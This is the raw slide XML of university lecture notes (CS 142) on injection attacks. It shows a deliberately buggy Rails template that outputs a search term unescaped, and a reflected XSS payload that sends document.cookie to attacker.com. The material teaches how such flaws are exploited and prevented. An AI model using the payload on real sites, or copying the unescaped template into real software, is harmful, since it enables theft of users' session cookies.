        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="320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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buggy server template:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2957136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CS 142 Lecture Notes: Injection Attacks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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slide </a:t>
            </a:r>
            <a:fld id="{F1128177-3609-4AA7-BC62-9C024B934194}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/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Reflected XSS Attack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457200" y="1843088"/>
            <a:ext cx="757130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&lt;h1&gt;Search Results&lt;/h1&gt;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Results for &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>searchTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html_safe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</a:rPr>
              <a:t>%&gt;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</a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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5910018" y="3352800"/>
            <a:ext cx="16337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chemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No escaping!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="folHlink"/>
              </a:solidFill>
            </a:endParaRPr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 flipV="1">
            <a:off x="6722142" y="2909888"/>
            <a:ext cx="0" cy="53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TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1443038"/>
            <a:ext cx="320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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buggy server template: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57200" y="4001631"/>
            <a:ext cx="772519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Justin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Bieber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style="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display:none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" id="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cookieMonster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"&gt;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script&gt;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document.getElementById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cookieMonster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");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img.src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= "http://attacker.com?cookie=" +</a:t>
            </a:r>
          </a:p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encodeURIComponent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document.cookie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script&gt;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57200" y="3560306"/>
            <a:ext cx="320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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entry:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="822512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142 Lecture Notes: Cookies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12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11606</TotalTime>
  <Words>673</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>139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Unsafe Server Code</vt:lpstr>
      <vt:lpstr>Injection Attack</vt:lpstr>
      <vt:lpstr>Stealing Private Information</vt:lpstr>
      <vt:lpstr>Stealing Private Info, cont'd</vt:lpstr>
      <vt:lpstr>Resulting Query</vt:lpstr>
      <vt:lpstr>Resulting Query</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>Let Rails Handle SQL Escaping</vt:lpstr>
      <vt:lpstr>Prepared Statements</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack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456</cp:revision>
  <cp:lastPrinted>2011-01-25T21:54:55Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-10-19T02:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-04T18:41:27Z</dcterms:modified>
</cp:coreProperties>
</file>